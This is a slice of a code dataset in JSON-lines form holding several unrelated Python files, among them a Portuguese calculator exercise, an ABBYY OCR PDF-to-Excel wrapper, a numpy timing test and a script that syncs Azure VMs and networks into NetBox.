False","sub_path":"FairPartition.py","file_name":"FairPartition.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"187121868","text":"print(\"\"\"\r\nEscreva o menu de opções abaixo. 
Leia A opção do usuário e execute A operação escolhida.\r\nEscreva uma mensagem de erro se A opção for inválida.\r\n Escolha A opção:\r\n 1- Soma de 2 números.\r\n 2- Diferença entre números (maior pela menor).\r\n 3- Produto entre 2 números.\r\n 4- Divisão entre 2 números (o denominador não pode ser zero).\r\n\"\"\")\r\n\r\nprint('''\t\r\nEscolha A opção:\r\n1- Soma de 2 números.\r\n2- Diferença entre números (maior pelo menor).\r\n3- Produto entre 2 números.\r\n4- Divisão entre 2 números (o denominador não pode ser zero).\r\n''')\r\nescolha = int(input('Escolha: '))\r\nnum1 = float(input('Um número: '))\r\nnum2 = float(input('Outro número: '))\r\n\r\nif escolha == 1:\r\n resultado = num1 + num2\r\n print(f'{num1} + {num2} = {resultado}')\r\n\r\nelif escolha == 2:\r\n if num1 > num2:\r\n resultado = num1 - num2\r\n print(f'{num1} - {num2} = {resultado}')\r\n\r\n else:\r\n resultado = num2 - num1\r\n print(f'{num2} - {num1} = {resultado}')\r\n\r\nelif escolha == 3:\r\n resultado = num1 * num2\r\n print(f'{num1} * {num2} = {resultado}')\r\n\r\nelif escolha == 4:\r\n if num1 > num2:\r\n if num2 != 0:\r\n resultado = num1 / num2\r\n print(f'{num1} / {num2} = {resultado}')\r\n\r\n else:\r\n if num1 != 0:\r\n resultado = num2 / num1\r\n print(f'{num2} / {num1} = {resultado}')\r\n","sub_path":"Seção_05/Exercício_21.py","file_name":"Exercício_21.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91699169","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport os\nimport time\n\nfrom Pdf2Excel.AbbyyOnlineSdk import *\n\nprocessor = AbbyyOnlineSdk()\n\nclass Pdf2Excel(object):\n \"\"\"\n build ABBYY OCR into a Pdf2Excel apckage,\n Environment Demands: argparse, AbbyyOnlineSdk\n \"\"\"\n \n processor = AbbyyOnlineSdk()\n\n def setup_processor(self):\n \tif \"ABBYY_APPID\" in os.environ:\n \t\tprocessor.ApplicationId = os.environ[\"ABBYY_APPID\"]\n\n \tif \"ABBYY_PWD\" in os.environ:\n \t\tprocessor.Password = os.environ[\"ABBYY_PWD\"]\n\n \t# Proxy settings\n \tif \"http_proxy\" in os.environ:\n \t\tproxy_string = os.environ[\"http_proxy\"]\n \t\tprint(\"Using http proxy at {}\".format(proxy_string))\n \t\tprocessor.Proxies[\"http\"] = proxy_string\n\n \tif \"https_proxy\" in os.environ:\n \t\tproxy_string = os.environ[\"https_proxy\"]\n \t\tprint(\"Using https proxy at {}\".format(proxy_string))\n \t\tprocessor.Proxies[\"https\"] = proxy_string\n\n\n # Recognize a file at filePath and save result to resultFilePath\n def recognize_file(self,file_path, result_file_path, language, output_format):\n print(\"Uploading..\")\n settings = ProcessingSettings()\n settings.Language = language\n settings.OutputFormat = output_format\n task = processor.process_image(file_path, settings)\n if task is None:\n print(\"Error\")\n return\n if task.Status == \"NotEnoughCredits\":\n print(\"Not enough credits to process the document. Please add more pages to your application's account.\")\n return\n\n print(\"Id = {}\".format(task.Id))\n print(\"Status = {}\".format(task.Status))\n\n # Wait for the task to be completed\n print(\"Waiting..\")\n # Note: it's recommended that your application waits at least 2 seconds\n # before making the first getTaskStatus request and also between such requests\n # for the same task. 
Making requests more often will not improve your\n # application performance.\n # Note: if your application queues several files and waits for them\n # it's recommended that you use listFinishedTasks instead (which is described\n # at http://ocrsdk.com/documentation/apireference/listFinishedTasks/).\n\n while task.is_active():\n time.sleep(5)\n print(\".\")\n task = processor.get_task_status(task)\n\n print(\"Status = {}\".format(task.Status))\n\n if task.Status == \"Completed\":\n if task.DownloadUrl is not None:\n processor.download_result(task, result_file_path)\n print(\"Result was written to {}\".format(result_file_path))\n else:\n print(\"Error processing task\")\n\n def create_parser():\n parser = argparse.ArgumentParser(description=\"Recognize a file via web service\")\n parser.add_argument('source_file')\n parser.add_argument('target_file')\n\n parser.add_argument('-l', '--language', default='English', help='Recognition language (default: %(default)s)')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-txt', action='store_const', const='txt', dest='format', default='txt')\n group.add_argument('-pdf', action='store_const', const='pdfSearchable', dest='format')\n group.add_argument('-rtf', action='store_const', const='rtf', dest='format')\n group.add_argument('-docx', action='store_const', const='docx', dest='format')\n group.add_argument('-xml', action='store_const', const='xml', dest='format')\n\n return parser\n\n #from process import *\n #这一步即可以,相当于加载上述函数,上面函数本来就是从process.py摘抄出来一步步run的\n def __init__(self,result=\"myworkbook.xlsx\",Language=\"English\",typefile=\"xlsx\"):\n \"\"\"\n Language input can be found here:https://ocrsdk.com/documentation/specifications/recognition-languages/ \n typefile input can be found here:https://ocrsdk.com/documentation/specifications/export-formats/ \n \"\"\"\n self.setup_processor()\n \n path=input(\"Your Pdf file path: like'C:/data/1.pdf'\")\n start=time.time()\n self.recognize_file(path, result, Language, typefile)#能识别中文简体ChinesePRC繁体ChineseTaiwan;中英文混合的怎么设置????\n #https://ocrsdk.com/documentation/specifications/recognition-languages/ 语言列表\n #https://ocrsdk.com/documentation/specifications/export-formats/ 输出格式列表\n T1=time.time()-start\n print('Total time spend %d seconds for 22 page pdf'%T1)\n #About 5 seconds per page\n #22 pages 都在一个sheet里,差评\n \nif __name__ == '__main__':\n main()\n","sub_path":"Pdf2Excel/Pdf2Excel.py","file_name":"Pdf2Excel.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474286993","text":"import numpy as np\r\n\r\nclass coil(object):\r\n def __init__(self):\r\n self.r = 23.72\r\n self.t = 1.94\r\n self.xo,self.yo = +111.46/2,0 # 0,2381.5\r\n self.yc = np.array([8.87,65.1,120.83,175.07,229.3,283.54,\r\n 337.77,392,446.24,500.47,554.71])+self.r\r\n self.xc= np.array([3.4,65.61,119.84,182.05,236.29,298.49,352.73])+self.r\r\n Ncol = [3,9,11,11,11,11,11]\r\n \r\n self.x,self.y = [],[]\r\n direction = 1\r\n for i,n in enumerate(Ncol):\r\n y_slice = self.yc[-n:]\r\n if direction is -1:\r\n y_slice = y_slice[::-1]\r\n for j in range(n):\r\n self.x.append(self.xc[-(1+i)])\r\n self.y.append(y_slice[j])\r\n direction *= -1\r\n \r\n self.xc = np.append(-self.xc[::-1], self.xc) + self.xo\r\n self.yc += self.yo\r\n self.x = np.append(self.x,-1*np.ones(len(self.x))*self.x[::-1])+self.xo\r\n self.y = np.append(self.y,self.y[::-1])+self.yo\r\n 
","sub_path":"etna/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433613297","text":"import timeit\nfrom numpy import random\n\n\nN = 5\nd = 3\nC = 5\n\nW = random.rand(C,d)\n\nresult = random.rand(d,1)\n\nwordvectors_list = [random.rand(d,1) for i in range(N)]\nprint(wordvectors_list)\nstart = timeit.timeit()\n[W.dot(wordvectors_list[i]) for i in range(N)]\nend = timeit.timeit()\nprint(end-start)\n\nwordvectors_one_matrix = random.rand(d,N)\nprint(wordvectors_one_matrix)\nstart = timeit.timeit()\nW.dot(wordvectors_one_matrix)\nend = timeit.timeit()\nprint(end-start)\n\n","sub_path":"work/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530746805","text":"#!/usr/bin/env python3\n\"\"\"Collects Azure resources and syncs them to Netbox via Python3\"\"\"\n\nfrom datetime import date, datetime\nfrom ipaddress import ip_network\nimport argparse\nimport requests\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.resource import SubscriptionClient\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom msrestazure import azure_exceptions\nimport settings\nfrom logger import log\n\n\ndef main():\n \"\"\"Main function to run if script is called directly\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-c\", \"--cleanup\", action=\"store_true\",\n help=\"Remove all Azure synced objects which support tagging. This is \"\n \"helpful if you want to start fresh or stop using this script.\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\",\n help=\"Enable verbose output. This overrides the log level in the \"\n \"settings file. Intended for debugging purposes only.\"\n )\n args = parser.parse_args()\n nb = NetBoxHandler()\n if args.verbose:\n log.setLevel(\"DEBUG\")\n log.debug(\"Log level has been overriden by the --verbose argument.\")\n if args.cleanup:\n start_time = datetime.now()\n nb.remove_all()\n log.info(\n \"Completed removal of Azure tenant ID '%s' objects. Total \"\n \"execution time %s.\",\n settings.AZURE_TENANT_ID, (datetime.now() - start_time)\n )\n else:\n start_time = datetime.now()\n nb.verify_dependencies()\n nb.sync_objects(az_obj_type=\"vms\")\n nb.sync_objects(az_obj_type=\"vnets\")\n log.info(\n \"Completed sync with Azure tenant ID '%s'! Total \"\n \"execution time %s.\", settings.AZURE_TENANT_ID,\n (datetime.now() - start_time)\n )\n\ndef az_slug(text):\n \"\"\"\n Prefix string with 'azure-' and then format for NetBox.\n\n returns string\n \"\"\"\n return format_slug(\"azure-{}\".format(text))\n\n\ndef compare_dicts(dict1, dict2, dict1_name=\"d1\", dict2_name=\"d2\", path=\"\"):\n \"\"\"\n Compares the key value pairs of two dictionaries and match boolean.\n\n dict1 keys and values are compared against dict2. dict2 may have keys and\n values that dict1 does not care evaluate.\n dict1_name and dict2_name allow you to overwrite dictionary name for logs.\n \"\"\"\n # Setup paths to track key exploration. 
The path parameter is used to allow\n # recursive comparisions and track what's being compared.\n result = True\n for key in dict1.keys():\n dict1_path = \"{}{}[{}]\".format(dict1_name, path, key)\n dict2_path = \"{}{}[{}]\".format(dict2_name, path, key)\n if key not in dict2.keys():\n log.debug(\"%s not a valid key in %s.\", dict1_path, dict2_path)\n result = False\n elif isinstance(dict1[key], dict) and isinstance(dict2[key], dict):\n log.debug(\n \"%s and %s contain dictionary. Evaluating.\", dict1_path,\n dict2_path\n )\n result = compare_dicts(\n dict1[key], dict2[key], dict1_name, dict2_name,\n path=\"[{}]\".format(key)\n )\n elif isinstance(dict1[key], list) and isinstance(dict2[key], list):\n log.debug(\n \"%s and %s key '%s' contains list. Validating dict1 items \"\n \"exist in dict2.\", dict1_path, dict2_path, key\n )\n if not all([bool(item in dict2[key]) for item in dict1[key]]):\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key]\n )\n result = False\n # Hack for NetBox v2.6.7 requiring integers for some values\n elif key in [\"status\", \"type\"]:\n if dict1[key] != dict2[key][\"value\"]:\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key][\"value\"]\n )\n result = False\n elif dict1[key] != dict2[key]:\n log.debug(\n \"Mismatch: %s value is '%s' while %s value is '%s'.\",\n dict1_path, dict1[key], dict2_path, dict2[key]\n )\n result = False\n if result:\n log.debug(\"%s and %s values match.\", dict1_path, dict2_path)\n else:\n log.debug(\"%s and %s values do not match.\", dict1_path, dict2_path)\n return result\n log.debug(\"Final dictionary compare result: %s\", result)\n return result\n\ndef find_resource_name(resource_id, resource_type):\n \"\"\"\n Determine an Azure resource name by parsing its resource ID.\n\n resource_id = String of URI path for the resource ID\n resource_type = String of the Azure resource type\n returns string\n \"\"\"\n resource_id = resource_id.split(\"/\")\n resource_type_index = resource_id.index(resource_type)\n return resource_id[resource_type_index+1]\n\ndef format_slug(text):\n \"\"\"\n Format string to comply to NetBox slug acceptable pattern and max length.\n\n NetBox slug pattern: ^[-a-zA-Z0-9_]+$\n NetBox slug max length: 50 characters\n \"\"\"\n allowed_chars = (\n \"abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\" # Alphabet\n \"01234567890\" # Numbers\n \"_-\" # Symbols\n )\n # Replace seperators with dash\n seperators = [\" \", \",\", \".\"]\n for sep in seperators:\n text = text.replace(sep, \"-\")\n # Strip unacceptable characters\n text = \"\".join([c for c in text if c in allowed_chars])\n # Enforce max length\n return truncate(text, max_len=50).lower()\n\ndef format_tag(tag):\n \"\"\"\n Format string to comply to NetBox tag format and max length.\n\n NetBox tag max length: 100 characters\n \"\"\"\n # If the tag presented is an IP address then no modifications are required\n try:\n ip_network(tag)\n except ValueError:\n # If an IP was not provided then assume fqdn\n tag = tag.split(\".\")[0]\n tag = truncate(tag, max_len=100)\n return tag\n\ndef prefix_template(prefix, description, tags):\n \"\"\"A template of the NetBox prefix object used by Azure resources.\"\"\"\n return {\n \"prefix\": prefix,\n \"description\": truncate(description, max_len=100),\n # VRF and tenant are initialized to be updated later\n \"vrf\": None,\n \"tenant\": None,\n \"status\": 1,\n \"tags\": tags,\n }\n\ndef 
truncate(text=\"\", max_len=50):\n \"\"\"Ensure a string complies to the maximum length specified.\"\"\"\n return text if len(text) < max_len else text[:max_len]\n\ndef verify_ip(ip_addr):\n \"\"\"\n Verify input is expected format and checks against allowed networks.\n\n Allowed networks can be defined in the settings IPV4_ALLOWED and\n IPV6_ALLOWED variables.\n \"\"\"\n result = False\n try:\n log.debug(\n \"Validating IP '%s' is properly formatted and within allowed \"\n \"networks.\",\n ip_addr\n )\n # Strict is set to false to allow host address checks\n version = ip_network(ip_addr, strict=False).version\n global_nets = settings.IPV4_ALLOWED if version == 4 \\\n else settings.IPV6_ALLOWED\n # Check whether the network is within the global allowed networks\n log.debug(\n \"Checking whether IP address '%s' is within %s.\", ip_addr,\n global_nets\n )\n net_matches = [\n ip_network(ip_addr, strict=False).overlaps(ip_network(net))\n for net in global_nets\n ]\n result = any(net_matches)\n except ValueError as err:\n log.debug(\"Validation of %s failed. Received error: %s\", ip_addr, err)\n log.debug(\"IP '%s' validation returned a %s status.\", ip_addr, result)\n return result\n\nclass AzureHandler:\n \"\"\"Handles Azure session management and object collection.\"\"\"\n def __init__(self):\n self.credentials = ServicePrincipalCredentials(\n client_id=settings.AZURE_SP_ID,\n secret=settings.AZURE_SP_KEY,\n tenant=settings.AZURE_TENANT_ID,\n )\n # Initialize clients for use across methods\n self.compute_client = None\n self.network_client = None\n self.subscription_client = SubscriptionClient(self.credentials)\n self.tags = [\"Synced\", \"Azure\"]\n\n def _get_skus(self):\n \"\"\"\n Provide Virtual Machine SKUs available for the provided subscription.\n\n returns dict\n \"\"\"\n # Collect available SKUs for subscription to compare against\n # Unfortunately the resource list is deprecated and this was\n # the documented method for determining memory and vCPU\n # Please feel free to help me find a better way!\n log.debug(\"Collecting VM SKUs available to the subscription.\")\n sub_vm_skus = {}\n for sku in self.compute_client.resource_skus.list():\n if sku.resource_type == \"virtualMachines\":\n sub_vm_skus[sku.name] = {}\n for cap in sku.capabilities:\n sub_vm_skus[sku.name][cap.name] = cap.value\n log.debug(\"Collected details of %s available VM SKUs.\", len(sub_vm_skus))\n return sub_vm_skus\n\n def _get_storage(self, vm):\n \"\"\"\n Get storage information for the provided virtual machine and return sum.\n\n vm = Azure virtual machine model\n returns integer of storage space\n \"\"\"\n # OS Disk\n log.debug(\"Collecting size of VM '%s' OS disk.\", vm.name)\n os_disk = vm.storage_profile.os_disk.managed_disk.id\n os_disk_rg = find_resource_name(\n resource_id=os_disk,\n resource_type=\"resourceGroups\"\n )\n os_disk_id = find_resource_name(\n resource_id=os_disk,\n resource_type=\"disks\"\n )\n storage_size_sum = self.compute_client.disks.get(\n resource_group_name=os_disk_rg,\n disk_name=os_disk_id\n ).disk_size_gb\n # Data Disks\n log.debug(\"Collecting size of VM '%s' data disks.\", vm.name)\n for data_disk in vm.storage_profile.data_disks:\n data_disk_size = data_disk.disk_size_gb\n if data_disk_size is not None:\n storage_size_sum += data_disk_size\n return storage_size_sum\n\n def _get_network_config(self, vm):\n \"\"\"\n Get network configuration for the provided virtual machine.\n\n vm = Azure virtual machine model\n returns dictionary containing nics and their configuration\n 
\"\"\"\n results = {\"virtual_interfaces\": [], \"ip_addresses\": []}\n vm_nics = vm.network_profile.network_interfaces\n for nic in vm_nics:\n nic_rg = find_resource_name(\n resource_id=nic.id,\n resource_type=\"resourceGroups\"\n )\n nic_name = find_resource_name(\n resource_id=nic.id,\n resource_type=\"networkInterfaces\"\n )\n # Collect IP information for NIC\n nic_conf = self.network_client.network_interfaces.get(\n resource_group_name=nic_rg,\n network_interface_name=nic_name\n )\n log.debug(\"Collecting VM '%s' VNIC '%s' data.\", vm.name, nic_name)\n nic_mac = nic_conf.mac_address.replace(\"-\", \":\")\n results[\"virtual_interfaces\"].append(\n {\n \"virtual_machine\": {\"name\": truncate(vm.name, max_len=64)},\n \"name\": truncate(nic_name, max_len=64),\n \"type\": 0, # 0 = Virtual\n \"enabled\": True,\n \"mac_address\": nic_mac.upper(),\n \"tags\": self.tags\n })\n # Each NIC may have multiple IP configs\n for ip in nic_conf.ip_configurations:\n priv_ip_addr = ip.private_ip_address\n subnet = ip.subnet.id\n subnet_name = find_resource_name(\n resource_id=subnet,\n resource_type=\"subnets\"\n )\n subnet_rg = find_resource_name(\n resource_id=subnet,\n resource_type=\"resourceGroups\"\n )\n subnet_vnet = find_resource_name(\n resource_id=subnet,\n resource_type=\"virtualNetworks\"\n )\n # Collect Subnet info\n subnet_info = self.network_client.subnets.get(\n resource_group_name=subnet_rg,\n virtual_network_name=subnet_vnet,\n subnet_name=subnet_name,\n )\n subnet_prefix = subnet_info.address_prefix\n subnet_cidr = subnet_prefix.split(\"/\")[-1]\n priv_ip_addr = \"{}/{}\".format(\n priv_ip_addr, subnet_cidr\n )\n # Collect Public IP config\n pub_ip_addr = None\n if hasattr(ip.public_ip_address, \"id\"):\n pub_ip_id = ip.public_ip_address.id\n pub_ip_rg = find_resource_name(\n resource_id=pub_ip_id,\n resource_type=\"resourceGroups\"\n )\n pub_ip_name = find_resource_name(\n resource_id=pub_ip_id,\n resource_type=\"publicIPAddresses\"\n )\n pub_ip = self.network_client.public_ip_addresses.get(\n resource_group_name=pub_ip_rg,\n public_ip_address_name=pub_ip_name\n )\n if pub_ip.public_ip_prefix is not None:\n pub_ip_addr = \"{}/{}\".format(\n pub_ip.ip_address,\n pub_ip.public_ip_prefix.split(\"/\")[-1]\n )\n else:\n pub_ip_addr = \"{}/32\".format(pub_ip.ip_address)\n # Create records for all IPs found\n ips = [\n ip for ip in [priv_ip_addr, pub_ip_addr] if ip is not None\n ]\n for ip_addr in ips:\n results[\"ip_addresses\"].append(\n {\n \"address\": ip_addr,\n \"vrf\": None,\n \"tenant\": None,\n \"interface\": {\n \"virtual_machine\": {\n \"name\": truncate(vm.name, max_len=64)\n },\n \"name\": truncate(nic_name, max_len=64),\n },\n \"tags\": self.tags,\n })\n return results\n\n def get_subscriptions(self):\n \"\"\"\n Get Azure subscriptions available under the provided tenant ID.\n\n returns dict of subscription id key and name value pair\n \"\"\"\n log.debug(\"Collecting subscriptions available to Azure tenant.\")\n subscriptions = {}\n for sub in self.subscription_client.subscriptions.list():\n subscriptions[sub.subscription_id] = sub.display_name\n return subscriptions\n\n def _get_regions(self, subscription_id):\n \"\"\"\n Get a list of regions available for the provided subscription ID.\n\n returns dict of regions\n \"\"\"\n log.debug(\n \"Collecting regions available to subscription ID '%s'.\",\n subscription_id\n )\n results = {}\n regions = self.subscription_client.subscriptions.list_locations(\n subscription_id=subscription_id\n )\n for region in regions:\n 
results[region.name] = {\n \"description\": \"Microsoft Azure {}\".format(region.display_name),\n }\n return results\n\n def get_vnets(self):\n \"\"\"Get Azure virtual networks for the provided subscription.\"\"\"\n results = {\"prefixes\": []}\n subscriptions = self.get_subscriptions()\n for sub_id in subscriptions:\n log.info(\"Accessing Azure Subscription ID '%s'.\", sub_id)\n self.network_client = NetworkManagementClient(\n self.credentials, sub_id\n )\n log.info(\"Collecting VNETs for Azure Subscription ID '%s'.\", sub_id)\n try:\n for vnet in self.network_client.virtual_networks.list_all():\n log.debug(\"Collecting VNET '%s' address spaces.\", vnet.name)\n for prefix in vnet.address_space.address_prefixes:\n results[\"prefixes\"].append(prefix_template(\n prefix=prefix,\n description=truncate(vnet.name, max_len=100),\n tags=self.tags\n ))\n for subnet in vnet.subnets:\n if subnet.address_prefixes is not None:\n for prefix in subnet.address_prefixes:\n results[\"prefixes\"].append(prefix_template(\n prefix=prefix.address_prefix,\n description=truncate(vnet.name, max_len=100),\n tags=self.tags\n ))\n else:\n results[\"prefixes\"].append(prefix_template(\n prefix=subnet.address_prefix,\n description=truncate(subnet.name, max_len=100),\n tags=self.tags\n ))\n except azure_exceptions.CloudError as err:\n log.warning(\n \"Unable to collect data from subscription ID '%s'. \"\n \"Received error '%s: %s'\", sub_id, err.error.error,\n err.message\n )\n return results\n\n def get_vms(self):\n \"\"\"Get Azure Virtual Machine information.\"\"\"\n # Initialize expected result keys\n results = {\n \"clusters\": [],\n \"virtual_machines\": [],\n \"virtual_interfaces\": [],\n \"ip_addresses\": []\n }\n used_regions = []\n subscriptions = self.get_subscriptions()\n for sub_id in subscriptions:\n log.info(\"Accessing Azure Subscription ID '%s'.\", sub_id)\n sub_vm_skus = {} # Store available subscription VM SKU details\n self.network_client = NetworkManagementClient(\n self.credentials, sub_id\n )\n self.compute_client = ComputeManagementClient(\n self.credentials, sub_id\n )\n regions = self._get_regions(sub_id)\n # Some subscriptions are not readable so catch and move on\n try:\n for vm in self.compute_client.virtual_machines.list_all():\n # We check whether the subscription SKUs have been collected\n # only if the subscription has VMs. 
This saves lots of time.\n if not sub_vm_skus:\n sub_vm_skus = self._get_skus()\n # Virtual Machine info\n log.info(\n \"Collecting information for Azure VM '%s'.\",\n vm.name\n )\n # Collect all regions used by VMs\n if vm.location not in used_regions:\n log.debug(\n \"VM region '%s' added to used regions.\", vm.location\n )\n used_regions.append(vm.location)\n vm_size = vm.hardware_profile.vm_size\n vm_mem = int(\n float(sub_vm_skus[vm_size][\"MemoryGB\"]) * 1024.0\n )\n os_type = vm.storage_profile.os_disk.os_type.value\n if os_type is not None:\n os_type = {\"name\": os_type}\n storage_size = self._get_storage(vm)\n results[\"virtual_machines\"].append(\n {\n \"name\": truncate(vm.name, max_len=64),\n \"status\": 1,\n \"cluster\": {\n \"name\": regions[vm.location][\"description\"]\n },\n \"role\": {\"name\": \"Server\"},\n \"platform\": os_type,\n \"vcpus\": int(sub_vm_skus[vm_size][\"vCPUs\"]),\n \"memory\": vm_mem,\n \"disk\": storage_size,\n \"tags\": self.tags,\n })\n # Network configuration\n network_objects = self._get_network_config(vm)\n for key in network_objects:\n results[key].extend(network_objects[key])\n except azure_exceptions.CloudError as err:\n log.warning(\n \"Unable to collect data from subscription ID '%s'. \"\n \"Received error '%s: %s'\", sub_id, err.error.error,\n err.message\n )\n # Clusters are done after virtual machines to ensure we only build\n # relevant regions\n for region in used_regions:\n # We check to make sure the results don't already contain the\n # site we want to add\n if not any(\n cluster[\"name\"] == regions[region][\"description\"]\n for cluster in results[\"clusters\"]):\n results[\"clusters\"].append(\n {\n \"name\": regions[region][\"description\"],\n \"type\": {\"name\": \"Public Cloud\"},\n \"group\": {\"name\": \"Microsoft Azure\"},\n \"tags\": self.tags,\n })\n return results\n\nclass NetBoxHandler:\n \"\"\"Handles NetBox connection state and interaction with the API\"\"\"\n def __init__(self):\n self.header = {\"Authorization\": \"Token {}\".format(settings.NB_API_KEY)}\n self.nb_api_url = \"http{}://{}{}/api/\".format(\n (\"s\" if not settings.NB_DISABLE_TLS else \"\"), settings.NB_FQDN,\n (\":{}\".format(settings.NB_PORT) if settings.NB_PORT != 443 else \"\")\n )\n self.nb_session = None\n # NetBox object type relationships when working in the API\n self.obj_map = {\n \"cluster_groups\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"cluster-groups\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"cluster_types\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"cluster-types\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"clusters\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"clusters\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 2\n },\n \"device_roles\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"device-roles\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"device_types\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"device-types\",\n \"key\": \"model\",\n \"prune\": True,\n \"prune_pref\": 3\n },\n \"devices\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"devices\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 4\n },\n \"interfaces\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"interfaces\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 5\n },\n \"ip_addresses\": {\n \"api_app\": \"ipam\",\n \"api_model\": \"ip-addresses\",\n \"key\": \"address\",\n \"prune\": True,\n \"prune_pref\": 9\n },\n \"manufacturers\": {\n \"api_app\": \"dcim\",\n 
\"api_model\": \"manufacturers\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"platforms\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"platforms\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"prefixes\": {\n \"api_app\": \"ipam\",\n \"api_model\": \"prefixes\",\n \"key\": \"prefix\",\n \"prune\": True,\n \"prune_pref\": 8\n },\n \"sites\": {\n \"api_app\": \"dcim\",\n \"api_model\": \"sites\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 1\n },\n \"tags\": {\n \"api_app\": \"extras\",\n \"api_model\": \"tags\",\n \"key\": \"name\",\n \"prune\": False,\n },\n \"virtual_machines\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"virtual-machines\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 6\n },\n \"virtual_interfaces\": {\n \"api_app\": \"virtualization\",\n \"api_model\": \"interfaces\",\n \"key\": \"name\",\n \"prune\": True,\n \"prune_pref\": 7\n },\n }\n\n def request(self, req_type, nb_obj_type, data=None, query=None, nb_id=None):\n \"\"\"\n HTTP requests and exception handler for NetBox\n\n req_type: HTTP Method\n nb_obj_type: NetBox object type, must match keys in self.obj_map\n data: Dictionary to be passed as request body.\n query: String used to filter results when using GET method\n nb_id: Integer used when working with a single NetBox object\n \"\"\"\n # If an existing session is not already found then create it\n # The goal here is session re-use without TCP handshake on every request\n if not self.nb_session:\n self.nb_session = requests.Session()\n self.nb_session.headers.update(self.header)\n result = None\n # Generate URL\n url = \"{}{}/{}/{}{}\".format(\n self.nb_api_url,\n self.obj_map[nb_obj_type][\"api_app\"], # App that model falls under\n self.obj_map[nb_obj_type][\"api_model\"], # Data model\n query if query else \"\",\n \"{}/\".format(nb_id) if nb_id else \"\"\n )\n log.debug(\"Sending %s to '%s'\", req_type.upper(), url)\n req = getattr(self.nb_session, req_type)(\n url, json=data, timeout=10, verify=(not settings.NB_INSECURE_TLS)\n )\n # Parse status\n if req.status_code == 200:\n log.debug(\n \"NetBox %s request OK; returned %s status.\", req_type.upper(),\n req.status_code\n )\n result = req.json()\n if req_type == \"get\":\n # NetBox returns 50 results by default, this ensures all results\n # are bundled together\n while req.json()[\"next\"] is not None:\n url = req.json()[\"next\"]\n log.debug(\n \"NetBox returned more than 50 objects. Sending %s to \"\n \"%s for additional objects.\", req_type.upper(), url\n )\n req = getattr(self.nb_session, req_type)(url, timeout=10)\n result[\"results\"] += req.json()[\"results\"]\n elif req.status_code in [201, 204]:\n log.info(\n \"NetBox successfully %s %s object.\",\n \"created\" if req.status_code == 201 else \"deleted\",\n nb_obj_type,\n )\n elif req.status_code == 400:\n if req_type == \"post\":\n log.warning(\n \"NetBox failed to create %s object. A duplicate record may \"\n \"exist or the data sent is not acceptable.\", nb_obj_type\n )\n log.debug(\n \"NetBox %s status reason: %s\", req.status_code, req.json()\n )\n elif req_type == \"put\":\n log.warning(\n \"NetBox failed to modify %s object with status %s. The \"\n \"data sent may not be acceptable.\", nb_obj_type,\n req.status_code\n )\n log.debug(\n \"NetBox %s status reason: %s\", req.status_code, req.json()\n )\n else:\n raise SystemExit(\n log.critical(\n \"Well this in unexpected. Please report this. 
\"\n \"%s request received %s status with body '%s' and \"\n \"response '%s'.\",\n req_type.upper(), req.status_code, data, req.json()\n )\n )\n log.debug(\"Unaccepted request data: %s\", data)\n elif req.status_code == 409 and req_type == \"delete\":\n log.warning(\n \"Received %s status when attemping to delete NetBox object \"\n \"(ID: %s). Please check the object dependencies.\",\n req.status_code, nb_id\n )\n log.debug(\"NetBox %s status body: %s\", req.status_code, req.json())\n else:\n raise SystemExit(\n log.critical(\n \"Well this in unexpected. Please report this. \"\n \"%s request received %s status with body '%s' and response \"\n \"'%s'.\",\n req_type.upper(), req.status_code, data, req.json()\n )\n )\n return result\n\n def obj_exists(self, nb_obj_type, az_data):\n \"\"\"\n Checks whether a NetBox object exists and matches the Azure object.\n\n If object does not exist or does not match the Azure object it will\n be created or updated.\n\n nb_obj_type: String NetBox object type to query for and compare against\n az_data: Dictionary of Azure object key value pairs pre-formatted for\n NetBox\n \"\"\"\n # NetBox object types do not have a standard key to search and filter\n # them by therefore we look up the appropriate key\n query_key = self.obj_map[nb_obj_type][\"key\"]\n # Create a query specific to the device parent/child relationship when\n # working with interfaces\n if nb_obj_type == \"interfaces\":\n query = \"?device={}&{}={}\".format(\n az_data[\"device\"][\"name\"], query_key, az_data[query_key]\n )\n elif nb_obj_type == 